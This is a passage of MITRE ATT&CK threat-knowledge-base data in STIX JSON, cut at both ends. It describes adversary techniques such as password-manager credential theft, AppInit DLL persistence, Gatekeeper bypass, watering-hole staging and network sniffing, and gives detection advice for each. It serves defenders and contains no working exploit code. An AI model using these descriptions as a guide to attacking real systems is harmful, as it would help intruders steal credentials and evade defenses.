"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1003/007", "external_id": "T1003.007"}, {"source_name": "atomic-red proc file system", "description": "Atomic Red Team. (2023, November). T1003.007 - OS Credential Dumping: Proc Filesystem. Retrieved March 28, 2024.", "url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}, {"source_name": "baeldung Linux proc map 2022", "description": "baeldung. (2022, April 8). Understanding the Linux /proc/id/maps File. Retrieved March 31, 2023.", "url": "https://www.baeldung.com/linux/proc-id-maps"}, {"source_name": "Polop Linux PrivEsc Gitbook", "description": "Carlos Polop. (2023, March 5). Linux Privilege Escalation. Retrieved March 31, 2023.", "url": "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#proc-usdpid-maps-and-proc-usdpid-mem"}, {"source_name": "MimiPenguin GitHub May 2017", "description": "Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.", "url": "https://github.com/huntergregal/mimipenguin"}, {"source_name": "Picus Labs Proc cump 2022", "description": "Huseyin Can YUCEEL & Picus Labs. (2022, March 22). Retrieved March 31, 2023.", "url": "https://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-its-adversary-use"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Botnet", "description": "Adversaries may buy, lease, or rent a network of compromised systems\u00a0that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--31225cd3-cd46-4575-b287-c2c14011c074", "created": "2020-10-01T00:49:05.467Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1583/005", "external_id": "T1583.005"}, {"source_name": "Norton Botnet", "description": "Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020.", "url": "https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html"}, {"source_name": "Imperva DDoS for Hire", "description": "Imperva. (n.d.). Booters, Stressers and DDoSers. Retrieved October 4, 2020.", "url": "https://www.imperva.com/learn/ddos/booters-stressers-ddosers/"}, {"source_name": "Krebs-Anna", "description": "Brian Krebs. (2017, January 18). Who is Anna-Senpai, the Mirai Worm Author?. Retrieved May 15, 2017.", "url": "https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/"}, {"source_name": "Krebs-Bazaar", "description": "Brian Krebs. (2016, October 31). Hackforums Shutters Booter Service Bazaar. Retrieved May 15, 2017.", "url": "https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/"}, {"source_name": "Krebs-Booter", "description": "Brian Krebs. (2016, October 27). Are the Days of \u201cBooter\u201d Services Numbered?. Retrieved May 15, 2017.", "url": "https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Password Managers", "description": "Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)\n\nAdversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)\n Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Matt Burrough, @mattburrough, Microsoft"], "x_mitre_detection": "Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. \n\nConsider monitoring file reads surrounding known password manager applications.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21", "created": "2021-01-22T16:08:40.629Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1555/005", "external_id": "T1555.005"}, {"source_name": "ise Password Manager February 2019", "description": "ise. (2019, February 19). Password Managers: Under the Hood of Secrets Management. Retrieved January 22, 2021.", "url": "https://www.ise.io/casestudies/password-manager-hacking/"}, {"source_name": "FoxIT Wocao December 2019", "description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China\u2019s hidden hacking groups. Retrieved October 8, 2020.", "url": "https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf"}, {"source_name": "Github KeeThief", "description": "Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8, 2021.", "url": "https://github.com/GhostPack/KeeThief"}, {"source_name": "NVD CVE-2019-3610", "description": "National Vulnerability Database. (2019, October 9). CVE-2019-3610 Detail. Retrieved April 14, 2021.", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3610"}, {"source_name": "Cyberreason Anchor December 2019", "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.", "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "AppInit DLLs", "description": "Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)\n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["Administrator", "SYSTEM"], "x_mitre_permissions_required": ["Administrator"], "x_mitre_system_requirements": ["Secure boot disabled on systems running Windows 8 and later"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--317fefa6-46c7-4062-adb6-2008cf6bcb41", "created": "2017-05-31T21:31:15.409Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1103", "external_id": "T1103"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "AppInit Registry", "description": "Microsoft. (2006, October). Working with the AppInit_DLLs registry value. Retrieved July 15, 2015.", "url": "https://support.microsoft.com/en-us/kb/197571"}, {"source_name": "AppInit Secure Boot", "description": "Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July 15, 2015.", "url": "https://msdn.microsoft.com/en-us/library/dn280412"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Gatekeeper Bypass", "description": "Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple\u2019s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )\n\nBased on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:\n\n1. Checks extended attribute \u2013 Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)\n\n2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.\n\n3. Code Signing \u2013 Gatekeeper checks for a valid code signature from an Apple Developer ID.\n\n4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an \u201cunauthorized app\u201d and the security policy will be modified.\n\nAdversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)\n\nApplications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Brandon Dalton @PartyD0lphin", "Swasti Bhushan Deb, IBM India Pvt. Ltd."], "x_mitre_deprecated": false, "x_mitre_detection": "The removal of the com.apple.quarantine flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the com.apple.quarantine flag when performing updates. \n\nReview false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag. \n\nQuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Application Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e", "created": "2020-02-05T16:16:08.471Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1553/001", "external_id": "T1553.001"}, {"source_name": "Application Bundle Manipulation Brandon Dalton", "description": "Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.", "url": "https://redcanary.com/blog/mac-application-bundles/"}, {"source_name": "theevilbit gatekeeper bypass 2021", "description": "Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.", "url": "https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/"}, {"source_name": "OceanLotus for OS X", "description": "Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.", "url": "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update"}, {"source_name": "TheEclecticLightCompany Quarantine and the flag", "description": "hoakley. (2020, October 29). Quarantine and the quarantine flag. Retrieved September 13, 2021.", "url": "https://eclecticlight.co/2020/10/29/quarantine-and-the-quarantine-flag/"}, {"source_name": "TheEclecticLightCompany apple notarization ", "description": "How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.", "url": "https://eclecticlight.co/2020/08/28/how-notarization-works/"}, {"source_name": "20 macOS Common Tools and Techniques", "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-04-15T00:21:55.791Z", "name": "Drive-by Target", "description": "Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).\n\nAdversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including:\n\n* Inserting malicious scripts into web pages or other user controllable web content such as forum posts\n* Modifying script files served to websites from publicly writeable cloud storage buckets\n* Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))\n\nIn addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)\n\nWebsites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "If infrastructure or patterns in the malicious web content utilized to deliver a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) have been previously identified, internet scanning may uncover when an adversary has staged web content for use in a strategic web compromise.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--31fe0ba2-62fd-4fd9-9293-4043d84f7fe9", "created": "2021-03-17T20:33:20.127Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1608/004", "external_id": "T1608.004"}, {"source_name": "ATT ScanBox", "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"}, {"source_name": "Gallagher 2015", "description": "Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as \u201cwatering holes\u201d. Retrieved January 25, 2016.", "url": "http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/"}, {"source_name": "FireEye CFR Watering Hole 2012", "description": "Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.", "url": "https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "System Service Discovery", "description": "Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start.\n\nAdversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Harshal Tupsamudre, Qualys"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", "created": "2017-05-31T21:30:21.315Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1007", "external_id": "T1007"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-19T12:32:44.370Z", "name": "Network Sniffing", "description": "Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)\n\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Oleg Kolesnikov, Securonix", "Tiago Faria, 3CORESec", "Austin Clark, @c2defense", "Itamar Mizrahi, Cymptom", "Eliraz Levi, Hunters"], "x_mitre_deprecated": false, "x_mitre_detection": "Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.\n\nIn cloud-based environments, monitor for the creation of new traffic mirrors or modification of existing traffic mirrors. For network infrastructure devices, collect AAA logging to monitor for the capture of network traffic.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network", "IaaS"], "x_mitre_version": "1.6", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Network interface access and packet capture driver"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", "created": "2017-05-31T21:30:41.399Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1040", "external_id": "T1040"}, {"source_name": "AWS Traffic Mirroring", "description": "Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.", "url": "https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html"}, {"source_name": "capture_embedded_packet_on_software", "description": "Cisco. (2022, August 17). Configure and Capture Embedded Packet on Software. Retrieved July 13, 2022.", "url": "https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html"}, {"source_name": "GCP Packet Mirroring", "description": "Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.", "url": "https://cloud.google.com/vpc/docs/packet-mirroring"}, {"source_name": "SpecterOps AWS Traffic Mirroring", "description": "Luke Paine. (2020, March 11). Through the Looking Glass \u2014 Part 1. Retrieved March 17, 2022.", "url": "https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512"}, {"source_name": "Azure Virtual Network TAP", "description": "Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.", "url": "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview"}, {"source_name": "Rhino Security Labs AWS VPC Traffic Mirroring", "description": "Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.", "url": "https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/"}, {"source_name": "US-CERT-TA18-106A", "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:02.990Z", "name": "Exploit Public-Facing Application", "description": "Adversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network. Internet-facing software may be user applications, underlying networking implementations, an assets operating system, weak defenses, etc. Targets of this technique may be intentionally exposed for the purpose of remote management and visibility.\n\nAn adversary may seek to target public-facing applications as they may provide direct access into an ICS environment or the ability to move into the ICS network. Publicly exposed applications may be found through online tools that scan the internet for open ports and services. Version numbers for the exposed application may provide adversaries an ability to target specific known vulnerabilities. Exposed control protocol or remote access ports found in Commonly Used Port may be of interest by adversaries.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["Application Log: Application Log Content", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0819", "external_id": "T0819"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Application Deployment Software", "description": "Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.\n\nAccess to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor application deployments from a secondary system. Perform application deployment at regular times so that irregular deployment activity stands 